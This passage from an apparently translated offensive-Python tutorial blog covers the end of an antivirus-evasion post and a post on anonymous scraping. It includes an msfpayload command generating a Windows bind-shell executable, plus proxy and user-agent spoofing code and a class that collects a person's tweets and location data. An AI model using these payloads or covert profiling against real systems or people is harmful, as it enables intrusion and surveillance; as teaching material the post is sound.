    <span class="n">re_results</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"Detection rate:.*\) "</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
    <span class="n">html_strip_res</span> <span class="o">=</span> <span class="n">re_results</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">replace</span><span class="p">(</span><span class="s">"&amp;lt;font color='red'&amp;gt;"</span><span class="p">,</span> <span class="s">''</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"&amp;lt;/font&amp;gt;"</span><span class="p">,</span> <span class="s">""</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">html_strip_res</span><span class="p">))</span>
</code></pre></div></div>

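<p>Use the default Metasploit encoder to encode the payload into a standard Windows executable. This file obviously will not escape detection by ordinary antivirus software.</p>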

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>msfpayload windows/shell_bind_tcp <span class="nv">LPORT</span><span class="o">=</span>1337 X <span class="o">&gt;</span> bindshell.exe
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><summary type="html"><![CDATA[Implementing antivirus evasion with Python]]></summary></entry><entry><title type="html">Probing the Network with Python</title><link href="https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python/" rel="alternate" type="text/html" title="Probing the Network with Python" /><published>2024-11-17T00:00:00+00:00</published><updated>2024-11-17T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/11/Probing%20the%20Network%20with%20Python/"><![CDATA[<h2 id="用-python-刺探网络">Probing the Network with Python</h2>

<h2 id="使用-mechanize-库上网">Browsing the Web with the Mechanize Library</h2>

<p>The main class in Mechanize, Browser, lets us manipulate anything in the browser.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">view_page</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">view_page</span><span class="p">(</span><span class="s">"http://www.syngress.com/"</span><span class="p">)</span>
</code></pre></div></div>

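<p>Mechanize provides stateful programming and convenient HTML form filling, and it makes it easy to parse and handle directives such as “HTTP-Equiv” and refresh. It also ships with a number of functions that help you stay anonymous.</p>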

<h3 id="匿名性使用代理服务器user-agent-及-cookie">Anonymity: Proxy Servers, User-Agent, and Cookies</h3>

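<p>A website has several ways to uniquely identify its visitors. The first is the IP address that the web server logs for each page request. Python can connect through a proxy server, which adds a degree of anonymity to a program. Mechanize's Browser class lets a program specify the proxy server to use. McCurdy maintains a list of working proxies at <a href="http://rmccurdy.com/scripts/proxy/good.txt">http://rmccurdy.com/scripts/proxy/good.txt</a>.</p>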

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">test_proxy</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">proxy</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">set_proxies</span><span class="p">(</span><span class="n">proxy</span><span class="p">)</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://ip.nefsc.noaa.gov/"</span>
<span class="n">hide_me_proxy</span> <span class="o">=</span> <span class="p">{</span><span class="s">"http"</span><span class="p">:</span> <span class="s">"216.155.139.115:3128"</span><span class="p">}</span>
<span class="n">test_proxy</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">hide_me_proxy</span><span class="p">)</span>
</code></pre></div></div>

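<p>The browser now has one layer of anonymity, but websites also use the <code class="language-plaintext highlighter-rouge">user-agent</code> string supplied by the browser as another way to uniquely identify a user. Under normal circumstances, the <code class="language-plaintext highlighter-rouge">user-agent</code> string tells the site which browser the user is running, and the field also records the kernel version, the browser version, and other details about the user. Malicious sites use this information to serve different exploit code to different browser versions, while other sites use it to tell apart the users on a LAN behind NAT.</p>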

<p>Mechanize makes changing the <code class="language-plaintext highlighter-rouge">user-agent</code> as easy as adding a proxy. <a href="http://www.useragentstring.com/pages/useragentstring.php">This site</a> lists a large number of valid <code class="language-plaintext highlighter-rouge">user-agent</code> strings.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="k">def</span> <span class="nf">test_user_agent</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">user_agent</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">addheaders</span> <span class="o">=</span> <span class="n">user_agent</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">source_code</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">source_code</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://whatismyuseragent.dotdoh.com/"</span>
<span class="n">user_agent</span> <span class="o">=</span> <span class="p">[(</span><span class="s">"User-agent"</span><span class="p">,</span> <span class="s">"Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) ..."</span><span class="p">)]</span>
<span class="n">test_user_agent</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">user_agent</span><span class="p">)</span>
</code></pre></div></div>
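<p>The same header can be set without Mechanize. As a rough sketch, assuming Python 3 and only the standard library, the snippet below builds a request object with a randomly chosen <code class="language-plaintext highlighter-rouge">User-Agent</code> and inspects it without sending anything. The helper name <code class="language-plaintext highlighter-rouge">build_request</code>, the example URL, and the two strings in the list are illustrative assumptions, not values from the post.</p>

```python
import random
import urllib.request

# Illustrative User-Agent strings; substitute any values you want to present.
USER_AGENTS = [
    "Mozilla/5.0 (X11; Linux x86_64) ExampleBrowser/1.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleBrowser/2.0",
]


def build_request(url, user_agents=USER_AGENTS, rng=random):
    """Return an unsent Request carrying a randomly chosen User-Agent."""
    user_agent = rng.choice(user_agents)
    return urllib.request.Request(url, headers={"User-Agent": user_agent})


request = build_request("http://example.com/")
# urllib stores header names capitalized, so the key is "User-agent".
print(request.get_header("User-agent"))
```

<p>Passing the request to <code class="language-plaintext highlighter-rouge">urllib.request.urlopen</code> would send it with that header; the sketch stops short of the network call so the header can be checked offline.</p>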

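<p>Websites also send cookies to the web browser. A cookie records information that uniquely identifies the user, and the site uses it to check whether the user has visited or logged in before. To prevent this, always clear the browser's cookies before doing anything anonymously. The cookielib library contains several containers for handling cookies. The one used here can save individual cookies to disk. With it, the user does not have to return a received cookie to the site and can inspect its contents.</p>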

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span>
<span class="kn">import</span> <span class="nn">cookielib</span>
<span class="k">def</span> <span class="nf">print_cookies</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="n">cookie_jar</span><span class="p">)</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">cookie</span> <span class="ow">in</span> <span class="n">cookie_jar</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">cookie</span><span class="p">)</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"http://www.syngress.com/"</span>
<span class="n">print_cookies</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
</code></pre></div></div>
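<p>In Python 3 the cookielib module is named <code class="language-plaintext highlighter-rouge">http.cookiejar</code>. The following offline sketch shows the same container being filled, inspected, and cleared. The cookie is created by hand purely for illustration (normally the server sets it), and <code class="language-plaintext highlighter-rouge">make_cookie</code>, the cookie name, and the domain are hypothetical.</p>

```python
import http.cookiejar
import urllib.request


def make_cookie(name, value, domain):
    """Create a session cookie by hand (normally the server sets these)."""
    return http.cookiejar.Cookie(
        version=0, name=name, value=value,
        port=None, port_specified=False,
        domain=domain, domain_specified=True, domain_initial_dot=False,
        path="/", path_specified=True,
        secure=False, expires=None, discard=True,
        comment=None, comment_url=None, rest={},
    )


cookie_jar = http.cookiejar.LWPCookieJar()
# An opener built this way stores every cookie it receives in cookie_jar.
opener = urllib.request.build_opener(
    urllib.request.HTTPCookieProcessor(cookie_jar)
)

cookie_jar.set_cookie(make_cookie("session", "abc123", "example.com"))
print([cookie.name for cookie in cookie_jar])  # names of the cookies held

cookie_jar.clear()  # drop everything before starting an anonymous session
print(len(cookie_jar))
```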

<h3 id="把代码集成在-python-类的-anonbrowser-中">Combining the Code into an AnonBrowser Python Class</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span><span class="p">,</span> <span class="n">cookielib</span><span class="p">,</span> <span class="n">random</span><span class="p">,</span> <span class="n">time</span>
<span class="k">class</span> <span class="nc">AnonBrowser</span><span class="p">(</span><span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxies</span><span class="o">=</span><span class="p">[],</span> <span class="n">user_agents</span><span class="o">=</span><span class="p">[]):</span>
        <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_handle_robots</span><span class="p">(</span><span class="bp">False</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span> <span class="o">=</span> <span class="n">proxies</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span> <span class="o">=</span> <span class="n">user_agents</span> <span class="o">+</span> <span class="p">[</span><span class="s">"Mozilla/4.0 FireFox/6.01"</span><span class="p">,</span> <span class="s">"ExactSearch"</span><span class="p">,</span> <span class="p">...]</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
        
    <span class="k">def</span> <span class="nf">clear_cookies</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span> <span class="o">=</span> <span class="n">cookielib</span><span class="p">.</span><span class="n">LWPCookieJar</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">set_cookiejar</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cookie_jar</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">change_user_agent</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">index</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span><span class="p">))</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">addheaders</span> <span class="o">=</span> <span class="p">[(</span><span class="s">"User-agent"</span><span class="p">,</span> <span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">user_agents</span><span class="p">[</span><span class="n">index</span><span class="p">]))]</span>

    <span class="k">def</span> <span class="nf">change_proxy</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">:</span>
            <span class="n">index</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">))</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">set_proxies</span><span class="p">({</span><span class="s">"http"</span><span class="p">:</span> <span class="bp">self</span><span class="p">.</span><span class="n">proxies</span><span class="p">[</span><span class="n">index</span><span class="p">]})</span>

    <span class="k">def</span> <span class="nf">anonymize</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sleep</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">clear_cookies</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">change_user_agent</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">change_proxy</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">sleep</span><span class="p">:</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">60</span><span class="p">)</span>
</code></pre></div></div>

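<p>The anonymize function also takes a parameter that makes the process sleep for 60 seconds, which widens the gap in the server logs between the requests made before and after anonymization.</p>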

<h2 id="用-anonbrowser-抓取更多的-web-页面">Scraping More Web Pages with AnonBrowser</h2>

<h2 id="用-beautiful-soup-解析-href-链接">Parsing href Links with Beautiful Soup</h2>

<p>To extract every link on a target page, there are two options: search the HTML with regular expressions, or use a powerful third-party library called BeautifulSoup.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">BeautifulSoup</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">print_links</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">ab</span><span class="p">.</span><span class="n">anonymize</span><span class="p">()</span>
    <span class="n">page</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="n">html</span> <span class="o">=</span> <span class="n">page</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printing Links From Regex."</span><span class="p">)</span>
        <span class="n">link_finder</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">'href="(.*?)"'</span><span class="p">)</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">link_finder</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Printing Links From BeautifulSoup."</span><span class="p">)</span>
        <span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">html</span><span class="p">)</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">findAll</span><span class="p">(</span><span class="n">name</span><span class="o">=</span><span class="s">'a'</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="s">'href'</span><span class="p">):</span>
                <span class="k">print</span><span class="p">(</span><span class="n">link</span><span class="p">[</span><span class="s">"href"</span><span class="p">])</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>        
</code></pre></div></div>

<h3 id="用-beautifulsoup-映射图像">Mirroring Images with BeautifulSoup</h3>

<p>BeautifulSoup lets us find every “IMG” tag in any HTML object; the browser object can then download each image and save it to the local disk as a binary file.</p>

<h2 id="研究调查发现">Research, Investigate, Discover</h2>

<h3 id="用-python-与谷歌-api-交互">Interacting with the Google API in Python</h3>

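<p>Google provides an application programming interface (API) that lets programmers run queries and retrieve results without having to use and master the “normal” Google page. Google has two APIs, a simplified one and a full one; the full API requires a developer key. The simplified API still allows a fair number of queries per day, and each search returns about 30 results.</p>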

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">urllib</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">google</span><span class="p">(</span><span class="n">search_term</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">search_term</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">quote_plus</span><span class="p">(</span><span class="n">search_term</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&amp;q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">search_term</span><span class="p">))</span>
    <span class="k">print</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">read</span><span class="p">())</span>
<span class="n">google</span><span class="p">(</span><span class="s">"Boondock Saint"</span><span class="p">)</span>
</code></pre></div></div>

<p>The response data is in JSON format.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
</code></pre></div></div>
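
<p>Note that json.load expects a file-like object (such as the response returned by the browser), while json.loads takes a string. A small sketch with an in-memory stream standing in for the response; the sample payload is made up for illustration.</p>

```python
import io
import json

# A made-up payload standing in for the body of an HTTP response.
raw = '{"responseData": {"results": [{"url": "http://example.com"}]}}'

# json.load reads from any object with a .read() method.
from_stream = json.load(io.StringIO(raw))
# json.loads parses a string that is already in memory.
from_string = json.loads(raw)

print(from_stream == from_string)
print(from_stream["responseData"]["results"][0]["url"])
```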

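<p>Next, write a class with no extra methods to hold the data. This makes each field easier to access, without having to dig through three levels of nested dictionaries every time a piece of information is needed.</p>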

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">quote_plus</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c1"># Plain container for a single search result</span>
<span class="k">class</span> <span class="nc">GoogleResult</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">title</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">title</span> <span class="o">=</span> <span class="n">title</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">text</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">url</span> <span class="o">=</span> <span class="n">url</span>
    <span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">title</span>

<span class="k">def</span> <span class="nf">google</span><span class="p">(</span><span class="n">search_term</span><span class="p">):</span>
    <span class="n">ab</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
    <span class="n">search_term</span> <span class="o">=</span> <span class="n">quote_plus</span><span class="p">(</span><span class="n">search_term</span><span class="p">)</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">ab</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"..."</span><span class="p">)</span>
    <span class="n">objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
    <span class="n">results</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">objects</span><span class="p">[</span><span class="s">"responseData"</span><span class="p">][</span><span class="s">"results"</span><span class="p">]:</span>
        <span class="n">url</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"url"</span><span class="p">]</span>
        <span class="n">title</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"titleNoFormatting"</span><span class="p">]</span>
        <span class="n">text</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"content"</span><span class="p">]</span>
        <span class="n">new_gr</span> <span class="o">=</span> <span class="n">GoogleResult</span><span class="p">(</span><span class="n">title</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
        <span class="n">results</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_gr</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">results</span>
</code></pre></div></div>
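
<p>To try the parsing logic without any network access, the sketch below runs the same three-level lookup on a hard-coded sample. The sample payload and the names SearchHit and parse_results are hypothetical; only the key names (responseData, results, url, titleNoFormatting, content) come from the code above.</p>

```python
import json
from dataclasses import dataclass

@dataclass
class SearchHit:
    """Plain data holder, analogous to GoogleResult above."""
    title: str
    text: str
    url: str

def parse_results(payload):
    """Turn a decoded JSON payload into a list of SearchHit objects."""
    hits = []
    # .get with defaults keeps the sketch safe on an empty or partial payload.
    for item in payload.get("responseData", {}).get("results", []):
        hits.append(SearchHit(item["titleNoFormatting"], item["content"], item["url"]))
    return hits

# Made-up sample with the same shape as the response handled above.
sample = json.loads("""
{"responseData": {"results": [
  {"url": "http://example.com/a", "titleNoFormatting": "First", "content": "one"},
  {"url": "http://example.com/b", "titleNoFormatting": "Second", "content": "two"}
]}}
""")

for hit in parse_results(sample):
    print(hit.title, hit.url)
```

<p>A dataclass gives the same field access as the hand-written class and generates the constructor automatically, which is one possible design choice here.</p>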

<h3 id="用-python-解析-tweets-个人主页">Parsing a Twitter Profile with Python</h3>

<p>Like Google, Twitter also provides an API for developers. The documentation is at <a href="https://dev.twitter.com/docs">dev.twitter.com/docs</a>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">quote_plus</span>
<span class="kn">from</span> <span class="nn">AnonBrowser</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">class</span> <span class="nc">ReconPerson</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">first_name</span><span class="p">,</span> <span class="n">last_name</span><span class="p">,</span> <span class="n">job</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">social_media</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">first_name</span> <span class="o">=</span> <span class="n">first_name</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">last_name</span> <span class="o">=</span> <span class="n">last_name</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">job</span> <span class="o">=</span> <span class="n">job</span>
        <span class="c1"># Avoid a shared mutable default: each instance gets its own dict</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">social_media</span> <span class="o">=</span> <span class="n">social_media</span> <span class="k">if</span> <span class="n">social_media</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span> <span class="k">else</span> <span class="p">{}</span>

    <span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="s">"{} {} has job {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">first_name</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">last_name</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">job</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">get_social</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">media_name</span><span class="p">):</span>
        <span class="c1"># dict.get returns None when the key is missing (has_key no longer exists in Python 3)</span>
        <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">social_media</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">media_name</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">query_twitter</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">query</span><span class="p">):</span>
        <span class="n">query</span> <span class="o">=</span> <span class="n">quote_plus</span><span class="p">(</span><span class="n">query</span><span class="p">)</span>
        <span class="n">results</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
        <span class="n">browser</span> <span class="o">=</span> <span class="n">AnonBrowser</span><span class="p">()</span>
        <span class="n">response</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://search.twitter.com/search.json?q={}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">query</span><span class="p">))</span>
        <span class="n">json_objects</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">json_objects</span><span class="p">[</span><span class="s">"results"</span><span class="p">]:</span>
            <span class="n">new_result</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"name"</span><span class="p">]</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"geo"</span><span class="p">]</span>
            <span class="n">new_result</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span> <span class="o">=</span> <span class="n">result</span><span class="p">[</span><span class="s">"text"</span><span class="p">]</span>
            <span class="n">results</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">new_result</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">results</span>
<span class="n">ap</span> <span class="o">=</span> <span class="n">ReconPerson</span><span class="p">(</span><span class="s">"Boondock"</span><span class="p">,</span> <span class="s">"Saint"</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">ap</span><span class="p">.</span><span class="n">query_twitter</span><span class="p">(</span><span class="s">"from:username since:2010-01-01 include:retweets"</span><span class="p">))</span>
</code></pre></div></div>
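
<p>The query string passed to query_twitter combines several search operators. As a sketch, a hypothetical helper build_twitter_query can assemble and encode it; the operator names are taken from the call above, and the default date and the retweets flag are assumptions.</p>

```python
from urllib.parse import quote_plus

def build_twitter_query(handle, since="2010-01-01", retweets=True):
    """Assemble and URL-encode a search query (hypothetical helper)."""
    parts = ["from:{}".format(handle), "since:{}".format(since)]
    if retweets:
        parts.append("include:retweets")
    # quote_plus turns spaces into "+" and ":" into "%3A".
    return quote_plus(" ".join(parts))

print(build_twitter_query("username"))
```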

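<h3 id="从推文中提取地理位置信息">Extracting Location Data from Tweets</h3>

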